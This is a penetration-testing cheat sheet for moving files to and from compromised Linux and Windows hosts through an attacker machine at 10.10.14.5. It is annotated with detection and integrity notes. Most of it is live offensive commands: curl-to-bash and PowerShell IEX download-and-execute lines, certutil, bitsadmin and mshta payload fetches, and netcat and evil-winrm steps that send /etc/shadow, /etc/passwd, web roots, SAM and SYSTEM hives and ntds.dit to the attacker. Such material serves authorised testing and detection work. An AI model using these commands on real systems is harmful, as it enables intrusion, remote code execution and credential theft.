
File Transfer Cheat Sheet


#LINUX TARGET - DOWNLOAD METHODS

# wget
# Both fetches use plain HTTP: nothing authenticates the server or protects the
# file in transit. Compare a SHA-256 digest with the hosting side before use.
# Detection: a script written to /tmp or /dev/shm (typically tmpfs, so not
# persisted across reboot) and then executed is a common host-monitoring signal.
wget http://10.10.14.5:8000/shell.sh -O /tmp/shell.sh
wget http://10.10.14.5:8000/linpeas.sh -O /dev/shm/linpeas.sh

# curl
curl http://10.10.14.5:8000/shell.sh -o /tmp/shell.sh
# Piping the response into bash runs whatever the server returns; no file is
# left to hash or inspect, and a truncated download still executes partially.
# Detection: process telemetry showing a shell whose stdin is fed by curl/wget.
curl http://10.10.14.5:8000/shell.sh | bash                        # pipe to shell
curl http://10.10.14.5:8000/linpeas.sh | bash

# Netcat
# nc moves data unauthenticated and in cleartext: anything on the path can read
# or alter it, so compare hashes on both ends after the transfer.
# NOTE(review): the sender below connects to 10.10.14.5, the address the rest
# of this page uses for the attacker host, so the listener is the side at
# 10.10.14.5. The original "(target)"/"(attacker)" labels looked swapped - confirm.
nc -lvnp 4444 > received.txt                  # receiver (listening side, 10.10.14.5)
nc 10.10.14.5 4444 < file_to_send.txt         # sender (connects to the listener)
# Or: nc -nv 10.10.14.5 4444 < /path/file     # push from target to attacker

# Reverse (attacker sends to target)
# Attacker listener: nc -lvnp 4444 < file.sh
# Target: nc 10.10.14.5 4444 > file.sh
# -q 0 quits as soon as stdin hits EOF; not every netcat build has -q
# (TODO confirm against the nc variant in use).
nc -q 0 10.10.14.5 4444 < file.sh             # send (close after)

# Base64 inline transfer
# Base64 is an encoding only: it gives neither confidentiality nor integrity.
# Record a SHA-256 of the file before encoding and re-check it after decoding.
# -w0 turns off line wrapping (GNU coreutils base64).
base64 file.bin -w0 | xclip -sel clip         # encode + copy to clipboard
echo "BASE64STRING" | base64 -d > file.bin    # decode on target

# /dev/tcp (bash built-in)
# Opens fd 3 as a read/write TCP connection to 10.10.14.5:8080. /dev/tcp is a
# bash redirection feature, not a device file, and the stream is cleartext.
# Detection relies on network telemetry or socket auditing of the shell
# process, since no separate transfer tool is spawned.
# fd 3 stays open until `exec 3>&-` or the shell exits.
exec 3<>/dev/tcp/10.10.14.5/8080
cat file.txt >&3                               # send file
cat <&3 > received.txt                         # receive file

# Python download (urllib.request.urlretrieve); this line only fetches, it does
# not start a server. Plain HTTP, so verify a digest of /tmp/file.sh afterwards.
python3 -c 'import urllib.request; urllib.request.urlretrieve("http://10.10.14.5:8000/file.sh","/tmp/file.sh")'

# Python wget alternative
# Reads the entire response into memory before writing it out; same plain-HTTP
# caveat as above.
python3 -c 'from urllib.request import urlopen; open("/tmp/file","wb").write(urlopen("http://10.10.14.5:8000/file").read())'

# scp
# Runs over SSH: the transfer is encrypted and the server is identified by its
# host key. Check the fingerprint on first connect rather than accepting blindly.
# With -i, the private key file must be readable by its owner only, or ssh
# rejects it.
scp user@10.10.14.5:/path/file /tmp/
scp -i id_rsa user@10.10.14.5:/path/file /tmp/

# rsync
# -a is archive mode (recursive, keeps permissions, times, symlinks), -v verbose.
# A user@host: source goes through a remote shell (ssh by default in current
# rsync versions).
rsync -av user@10.10.14.5:/path/ /tmp/

#WINDOWS TARGET - DOWNLOAD METHODS

# === PowerShell WebClient ===
# Every URL here is plain HTTP: no server authentication, no integrity check.
# Detection: PowerShell script block logging (event ID 4104) and process
# command-line auditing record DownloadFile/DownloadString calls.
(New-Object Net.WebClient).DownloadFile("http://10.10.14.5/nc.exe","C:\Windows\Temp\nc.exe")
# DownloadString | IEX evaluates the response in memory without writing a file;
# script block logging and AMSI still see the evaluated content.
(New-Object Net.WebClient).DownloadString("http://10.10.14.5/script.ps1") | IEX
$wc = New-Object System.Net.WebClient; $wc.DownloadFile("http://10.10.14.5/file.exe","C:\temp\file.exe")

# === Invoke-WebRequest (PowerShell 3+) ===
# Files saved this way can be hashed with Get-FileHash before they are run.
Invoke-WebRequest -Uri http://10.10.14.5:8000/file.exe -OutFile C:\temp\file.exe
iwr http://10.10.14.5:8000/file.exe -OutFile C:\temp\file.exe
# The wget alias exists in Windows PowerShell 5.1 only; PowerShell 6+ removed it.
wget http://10.10.14.5:8000/file.exe -OutFile C:\temp\file.exe  # alias

# === CertUtil (CMD, no PS needed) ===
# Detection: certutil invoked with -urlcache and a URL is widely alerted on by
# AV/EDR, and it leaves a cached copy in the user's CryptnetUrlCache directory,
# which is a useful forensic artifact.
certutil -urlcache -f http://10.10.14.5/nc.exe C:\temp\nc.exe
# NOTE(review): "split" is a bare trailing word here, unlike the -split option
# on the next line - confirm this form is intended.
certutil -urlcache -f http://10.10.14.5/nc.exe C:\temp\nc.exe split
certutil -urlcache -split -f http://10.10.14.5/file.txt file.txt

# === BITSAdmin (CMD) ===
# BITS jobs are recorded in the Microsoft-Windows-Bits-Client/Operational log,
# including the remote URL, so transfers remain visible after the fact.
bitsadmin /transfer jobname /download /priority high http://10.10.14.5/nc.exe C:\temp\nc.exe
bitsadmin /transfer myjob http://10.10.14.5:8000/file.exe C:\temp\file.exe

# === Start-BitsTransfer (PowerShell) ===
# Same BITS service and logging as bitsadmin above.
Start-BitsTransfer -Source http://10.10.14.5/file.exe -Destination C:\temp\file.exe

# === FTP (scripted through a -s: command file, not interactive) ===
# The echo lines build ftp.txt, which ftp -s: then replays. FTP sends the
# USER/PASS values and the file in cleartext, and ftp.txt keeps the
# credentials on disk until it is deleted.
# "binary" matters for executables: ASCII mode rewrites line endings and
# corrupts them.
echo open 10.10.14.5 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo PASS anonymous >> ftp.txt
echo binary >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

# === VBScript / mshta ===
# mshta.exe fetches the HTA and runs the script inside it. Mitigation:
# application control (WDAC/AppLocker) rules for mshta.exe. Detection:
# mshta.exe launched with a URL argument or making outbound connections.
mshta.exe http://10.10.14.5/file.hta

# === PowerShell inline (no file write) ===
# Nothing lands on disk, so file-based scanning does not apply; script block
# logging (event ID 4104) and AMSI are the controls that see the content.
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1')
IEX(iwr http://10.10.14.5/script.ps1 -UseBasicParsing)

# === SMB share mount ===
# The password is passed on the command line, so process command-line auditing
# captures it. Connecting to an SMB server outside the network also sends an
# NTLM authentication attempt to it; egress filtering of TCP 445 prevents both.
net use \\10.10.14.5\share /user:user pass
copy \\10.10.14.5\share\nc.exe C:\temp\

#HOSTING FILES - ATTACKER SIDE

# Python HTTP server
# http.server listens on all interfaces by default and serves the current
# directory (or --directory) with listings, no authentication and no TLS:
# every file below that directory is readable by anyone who can reach the port.
# Use --bind ADDRESS to restrict the listener, and serve a dedicated directory.
python3 -m http.server 8000                       # Python 3
python -m SimpleHTTPServer 8000                   # Python 2
python3 -m http.server 8000 --directory /opt/tools

# Alternative: Python upload server (accepts PUT/POST)
# uploadserver is a third-party package, not part of the standard library; as
# invoked here it accepts uploads without authentication.
python3 -m uploadserver 8000

# Impacket SMB server
# "share ." exports the current working directory. Without a username and
# password the share is open to any client that can reach it.
# NOTE(review): the SMB section further down spells these options
# -username/-password; confirm which spelling the installed impacket accepts.
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -user user -pass password
impacket-smbserver share /opt/tools -smb2support -ip 10.10.14.5

# Simple nginx (config file: /etc/nginx/sites-enabled/upload)
# nginx -t validates the configuration first; the restart runs only if it passes.
sudo nginx -t && sudo systemctl restart nginx
# nginx config: root /opt/share; autoindex on;
# autoindex on publishes a directory listing of everything under the root.

# PHP built-in server
# 0.0.0.0 binds every interface. The built-in server is a development server:
# it serves the current directory and executes any .php file found in it.
php -S 0.0.0.0:8000

# Ruby HTTP server
ruby -run -e httpd /opt/share -p 8000

# FTP (pyftpdlib)
# -w grants write permission, so with anonymous access any client can upload
# to or overwrite files in the served directory. Port 21 is privileged, so the
# process normally needs root. FTP itself is cleartext.
python3 -m pyftpdlib -p 21 -w
python3 -m pyftpdlib -p 21 -w -u anonymous -P anonymous

#BASE64 ENCODE / DECODE FOR INLINE TRANSFER

# === Linux ===
# Encode
# Both forms produce one unwrapped line; -w0 is GNU-specific, the tr variant
# strips the line breaks instead.
base64 file.bin -w0
base64 file.sh | tr -d '\n'
# MD5 catches accidental corruption (for example a truncated paste) but is not
# collision-resistant; use sha256sum when tampering is a concern.
md5sum file.bin                    # verify hash

# Decode
echo "BASE64STRING" | base64 -d > file.bin
# The second form executes the decoded bytes directly, with no chance to hash
# or read them first.
echo "BASE64STRING" | base64 -d | bash      # decode and pipe to shell

# Single-line encode + copy
base64 -w0 shell.sh | xclip -sel clip       # copy to clipboard

# === Windows PowerShell ===
# Encode
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\file.exe"))
# -Encoding Byte works in Windows PowerShell 5.1; PowerShell 6+ uses
# -AsByteStream instead.
$data = Get-Content file.bin -Encoding Byte; [Convert]::ToBase64String($data)

# Decode
# Get-FileHash (SHA256 by default) verifies the written file against the source.
$b64 = "BASE64STRING"
[IO.File]::WriteAllBytes("C:\temp\file.exe", [Convert]::FromBase64String($b64))

# === Windows CMD ===
# certutil -encode wraps the output in BEGIN/END CERTIFICATE lines; -decode
# expects that format. Detection: certutil -decode writing an executable.
certutil -encode file.exe file.b64
certutil -decode file.b64 file.exe

#EVIL-WINRM FILE TRANSFER

# Connect first
# The password is given with -p on the command line, so it ends up in shell
# history and in the process list of the machine running the client.
# On the Windows side the session shows up as a WinRM network logon (event ID
# 4624, logon type 3) and in the Windows Remote Management operational log.
evil-winrm -i 10.10.10.5 -u administrator -p 'Passw0rd!'

# In the evil-winrm shell:
# Detection: new executables appearing in C:\Windows\Temp during a WinRM session.
upload /local/path/nc.exe C:\Windows\Temp\nc.exe
upload /opt/tools/winpeas.exe C:\Windows\Temp\winpeas.exe
upload /opt/tools/SharpHound.exe C:\Windows\Temp\SharpHound.exe

# These files hold credential material (SAM and SYSTEM hives, the AD database).
# Copies of them in temp directories, or leaving the host, are a high-severity
# indicator; alert on registry hive saves and on access to ntds.dit.
download C:\Windows\Temp\sam.hive /local/path/sam.hive
download C:\Windows\Temp\system.hive /local/path/system.hive
download C:\Windows\System32\config\ntds.dit /local/path/ntds.dit

# Upload directory
upload /opt/tools/ C:\Windows\Temp\tools\

#NETCAT FILE TRANSFER

# Methods 1-4 use plain nc: no encryption, no authentication, no integrity
# check. Compare a SHA-256 of the file on both ends after each transfer.

# === Method 1: Push from attacker to target ===
# Attacker (send file):
nc -lvnp 4444 < file.sh
# Target (receive):
nc 10.10.14.5 4444 > file.sh
# Wait for transfer, then Ctrl+C
# nc gives no completion signal here, so a short file may simply be a cut-off one.

# === Method 2: Pull from target to attacker ===
# Attacker (receive):
nc -lvnp 4444 > received.txt
# Target (send):
nc 10.10.14.5 4444 < /etc/passwd

# === Method 3: Tar + netcat (transfer directory) ===
# Target (compress + send):
tar czf - /var/www | nc 10.10.14.5 4444
# Attacker (receive + extract):
# The archive arrives over an unauthenticated socket and is unpacked as it
# streams in; extract into a dedicated empty directory, not a working tree.
nc -lvnp 4444 | tar xzf -

# === Method 4: with progress ===
# Attacker: nc -lvnp 4444 | pv -b > file.bin
# Target: nc 10.10.14.5 4444 < file.bin

# === Method 5: Encrypted transfer via ncat (ssl) ===
# --ssl encrypts the stream, but ncat does not verify the peer certificate
# unless --ssl-verify is given, so the peer is still unauthenticated.
# Attacker: ncat --ssl -lvnp 4444 > file.txt
# Target: ncat --ssl 10.10.14.5 4444 < /etc/shadow

#SCP / SFTP

# SCP and SFTP both run over SSH: traffic is encrypted and the server is
# identified by its host key. Check the fingerprint on first connect.
# Server-side sshd logs record each login, which is the audit trail for these.

# SCP upload
# -i selects a private key (it must be readable by its owner only);
# -P (capital) sets the port, lowercase -p means preserve times and modes.
scp /local/file user@10.10.10.5:/tmp/
scp -i key.pem /local/file user@10.10.10.5:/tmp/
scp -P 2222 file.txt user@10.10.10.5:/tmp/

# SCP download
# -r copies the directory recursively.
scp user@10.10.10.5:/etc/passwd ./passwd
scp -r user@10.10.10.5:/var/www ./www_backup

# SFTP interactive
# Lines starting with "sftp>" are typed at the sftp prompt, not in the shell.
sftp user@10.10.10.5
sftp> put localfile
sftp> get /etc/passwd
sftp> ls
sftp> cd /tmp

# SFTP with key
sftp -i key.pem user@10.10.10.5

#RDP CLIPBOARD / DRIVE REDIRECTION

# xfreerdp with clipboard and drive mount
# /p: puts the password in the process list and shell history of the client;
# leaving /p: out makes xfreerdp prompt for it instead.
# /drive:NAME,PATH exposes the local PATH to the remote session, where
# anything running in that session can read and write it. +clipboard shares
# clipboard contents the same way.
# Mitigation on the server: the Group Policy settings that disable drive and
# clipboard redirection for Remote Desktop sessions.
xfreerdp /v:10.10.10.5 /u:administrator /p:'Passw0rd!' +clipboard /drive:share,/opt/tools
xfreerdp /v:10.10.10.5 /u:user /p:pass /drive:tools,/opt/share

# After connected, access at:
# \\tsclient\share\file.exe
# \\tsclient\tools\nc.exe

# rdesktop (legacy)
# Same caveats: password on the command line, local directory redirected.
rdesktop -u administrator -p 'Passw0rd!' -r disk:share=/opt/tools 10.10.10.5

# Windows native RDP (mstsc.exe) - Local Resources tab > More > Drives

#IMPACKET SMBSERVER (attacker hosts, target mounts)

# Attacker start SMB share
# The first form exports the current directory with no credentials required;
# the second requires the given username and password.
impacket-smbserver share . -smb2support
impacket-smbserver share /opt/tools -smb2support -username user -password pass

# Target Windows - mount
# The password is on the command line, where process command-line auditing
# records it. Outbound SMB to an external host also sends an NTLM
# authentication attempt to that host; blocking egress TCP 445 prevents both.
net use Z: \\10.10.14.5\share /user:user pass
copy Z:\nc.exe C:\temp\nc.exe
# Removes the drive mapping once the copy is done.
net use Z: /delete

# Target Windows - no mount, direct copy
copy \\10.10.14.5\share\nc.exe C:\temp\
dir \\10.10.14.5\share\

# Target Linux - mount
# password= in the -o string is visible in the process list; mount.cifs also
# accepts credentials=FILE pointing at a file readable by root only.
# The second line is a guest mount with an empty password.
sudo mount -t cifs //10.10.14.5/share /mnt -o username=user,password=pass
sudo mount -t cifs //10.10.14.5/share /mnt -o user=guest,password=

#QUICK TRANSFER DECISION TABLE

Target has wget/curl?       -> wget or curl (simplest)
Target has PowerShell?       -> IWR or WebClient
Target has certutil?         -> certutil -urlcache -f
Target has bitsadmin?        -> bitsadmin /transfer (background)
No tools, bash available?    -> base64 encode + decode, OR /dev/tcp
No tools, interactive shell? -> base64 copy-paste
Firewall blocks outgoing?    -> nc from attacker (reverse), or SMB share
Evil-WinRM session?          -> upload / download commands
Need directory transfer?     -> tar | nc
Metasploit session?          -> meterpreter upload/download